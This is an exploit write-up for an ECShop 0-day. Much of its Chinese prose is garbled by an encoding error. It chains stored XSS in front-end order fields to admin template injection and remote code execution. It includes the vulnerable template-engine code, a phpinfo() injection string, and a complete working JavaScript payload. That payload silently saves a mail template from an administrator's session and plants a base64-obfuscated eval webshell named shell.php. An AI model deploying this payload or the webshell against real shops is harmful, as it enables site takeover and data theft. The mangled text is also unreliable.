ecshopº̨0day©ԭ+÷ XSS+Getshell

ڣ2012-10.25
 
ߣdis9@ztz
 
©ͣվ ִ
 
00 ̨getshell
  includes/cls_template.php fetch
 1./**
 2.* ģļ
 3.*
 4.* @access public
 5.* @param string $filename
 6.* @param string $cache_id
 7.*
 8.* @return string
 9.*/
 10.function fetch($filename, $cache_id = )
 11.{
 12.if (!$this->_seterror)
 13.{
 14.error_reporting(E_ALL ^ E_NOTICE);
 15.}
 16.$this->_seterror++;
 17.//$filenamestr:ͷִwww.yunsec.net
 18.if (strncmp($filename,str:, 4) == 0)
 19.{
 20.$out = $this->_eval($this->fetch_str(substr($filename, 4)));
 21.}
 22.   
 23.Կ$filenameԡstr:ͷô͵_eval()ִСstr:Ĵ,ִ֮ǰϵͳfetch_strַҺ滻
 24._eval():
 /**
  * Run a compiled template fragment and return everything it printed.
  *
  * SECURITY (review): this is the code-execution sink of the template
  * engine. The fragment is prefixed with a closing tag so it is executed
  * like an inline PHP file (literal text is echoed, '<?php ... ?>' runs),
  * and the output is captured with output buffering. Any caller that lets
  * untrusted text reach $content -- e.g. fetch('str:' . $template) on an
  * admin-editable mail template -- hands that author arbitrary PHP.
  *
  * @param string $content compiled template source (literal text mixed with PHP)
  * @return string captured output of the evaluated fragment
  */
 function _eval($content)
 {
     ob_start();
     // '?' . '>' is split so the literal closing tag does not end this file.
     eval('?' . '>' . trim($content));
     // ob_get_clean() == ob_get_contents() followed by ob_end_clean().
     return ob_get_clean();
 }
 33.eval()ִ$contentˣfetch_str()
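 /**
  * Compile a template string into the PHP source that _eval() will run.
  *
  * Outside the admin area the source first goes through the Smarty-style
  * prefilter. Literal PHP / ASP / <script language="php"> blocks written
  * directly into the template are then stripped, and every remaining
  * {tag} is passed to $this->select(), whose return value replaces the tag.
  *
  * SECURITY (review): stripping '<?php ... ?>' from the raw template is not
  * a sandbox. select() builds PHP code out of the tag body and _eval()
  * later eval()s the result, so a tag body that closes the generated
  * $this->_var['...'] expression and appends its own statements (the
  * writeup's phpinfo() example) still executes. Template text must be
  * treated as code and only ever be editable by fully trusted admins.
  *
  * @param string $source raw template text
  * @return string compiled template (literal text plus generated PHP)
  */
 function fetch_str($source)
 {
     if (!defined('ECS_ADMIN'))
     {
         $source = $this->smarty_prefilter_preCompile($source);
     }
     // Remove code blocks the template author embedded verbatim.
     $source = preg_replace('/<\?[^><]+\?>|<\%[^><]+\%>|<script[^>]+language[^>]*=[^>]*php[^>]*>[^><]*<\/script\s*>/iU', '', $source);
     // The original used the /e modifier ("\$this->select('\\1');"), which
     // eval()s the replacement string and was removed in PHP 7. The callback
     // form hands the same raw tag body to select() without that extra eval.
     // ($self is captured because closures cannot use $this before PHP 5.4.)
     $self = $this;
     return preg_replace_callback('/{([^\}\{\n]*)}/', function ($m) use ($self) {
         return $self->select($m[1]);
     }, $source);
 }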
 51.phpԵıǡ
 52.Ҫ鿴Щҵδ룺wholesale.php
 53./* */
 54.//C ύ
 55./* */
 56.elseif ($_REQUEST['act'] == submit_order)
 57.{
 58.include_once(ROOT_PATH . includes/lib_order.php);
 59.            
 60.            
 61./* ̼ҷʼ */
 62.if ($_CFG['service_email'] != )
 63.{
 64.$tpl = get_mail_template(remind_of_new_order);
 65.           
 66.           
 67.$content = $smarty->fetch(str: . $tpl['template_content']);
 68.           
 69.}
 
ύĵط˴get_mail_template()remind_of_new_orderģݣȻ뵽fetchִУԿremind_of_new_orderģǾͿecshopִǵˡ
 ں̨ģҵʼģ壬remind_of_new_orderΪ{$phpinfo()];phpinfo();/*}ȻڵпԿ뱻滻ˡ<?php echo $this->_var['phpinfo()'];phpinfo();/*]; ?>
 ɹִС
 


01 ǰ̨xss
 ǰ̨Щط˲֣ûԹjavascriptɶԺ̨Աxss
 עûԺջϢ绰һֻбصĿͻ˼飬ûк˹ˣеxss
 


02 xss+̨getshell
 ûcsrfķ˿ǰ̨xss̨ùԱgetshell
 ʵgetshelljs
 


// Exploit payload quoted by the writeup: JavaScript that, when it runs in a
// logged-in ECShop administrator's browser (delivered via the front-end XSS),
// silently saves a mail template through admin/mail_template.php.
//
// The urlencoded form body is reproduced byte-for-byte. Its `content` field
// is a template tag that, after fetch_str() compiles it and _eval() runs it,
// calls file_put_contents() with two base64 arguments:
//   'c2hlbGwucGhw'                                  -> "shell.php"
//   'PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4='      -> "<?php @eval($_POST['207']);?>"
// i.e. a one-line webshell with POST parameter "207", matching the writeup.
var Shelldata = "subject=%C3%DC%C2%EB%D5%D2%BB%D8&mail_type=0&tpl=1&content=%7B%24user_name%27%5D%3Bfile_put_contents%28base64_decode%28%27c2hlbGwucGhw%27%29%2Cbase64_decode%28%27PD9waHAgQGV2YWwoJF9QT1NUWycyMDcnXSk7Pz4%3D%27%29%29%3Becho+%24var%5B%27%24user_name%7D%0D%0A%3C%2Fp%3E%0D%0A%3Cp%3E%7B%24user_name%7D%C4%FA%BA%C3%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%C4%FA%D2%D1%BE%AD%BD%F8%D0%D0%C1%CB%C3%DC%C2%EB%D6%D8%D6%C3%B5%C4%B2%D9%D7%F7%A3%AC%C7%EB%B5%E3%BB%F7%D2%D4%CF%C2%C1%B4%BD%D3%28%BB%F2%D5%DF%B8%B4%D6%C6%B5%BD%C4%FA%B5%C4%E4%AF%C0%C0%C6%F7%29%3A%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%3Ca+target%3D%22_blank%22+href%3D%22%7B%24reset_email%7D%22%3E%7B%24reset_email%7D%3C%2Fa%3E%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%D2%D4%C8%B7%C8%CF%C4%FA%B5%C4%D0%C2%C3%DC%C2%EB%D6%D8%D6%C3%B2%D9%D7%F7%A3%A1%3Cbr+%2F%3E%0D%0A%3Cbr+%2F%3E%0D%0A%7B%24shop_name%7D%3Cbr+%2F%3E%0D%0A%7B%24send_date%7D%3C%2Fp%3E";

try {
    // Standards XHR with the legacy IE ActiveX fallback; the request is
    // synchronous (third argument false) and rides on the admin's session
    // cookie -- there is no CSRF token on the save_template action.
    var xml = window.XMLHttpRequest
        ? new XMLHttpRequest()
        : new ActiveXObject("Microsoft.XMLHTTP");
    xml.open("POST", "/ecshop/upload/admin/mail_template.php?act=save_template", false);
    xml.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
    xml.onreadystatechange = function () {
        if (xml.readyState == 4) {
            // response intentionally ignored
        }
    };
    xml.send(Shelldata);
} catch (e) {
    // errors are swallowed so nothing is visible on the hosting page
}


 
 
ϴjsͼƬûֱӴⲿվöԡΪ˲Է㣬ӱ
 


ύԱʸöûһ룬ͻڸĿ¼shell.php207.
 
Աʶǰһģ壺
 


Ա鿴
 


鿴֮ʼģ
 


ûǰ̨һ룬Ŀ¼һ仰shell.php
 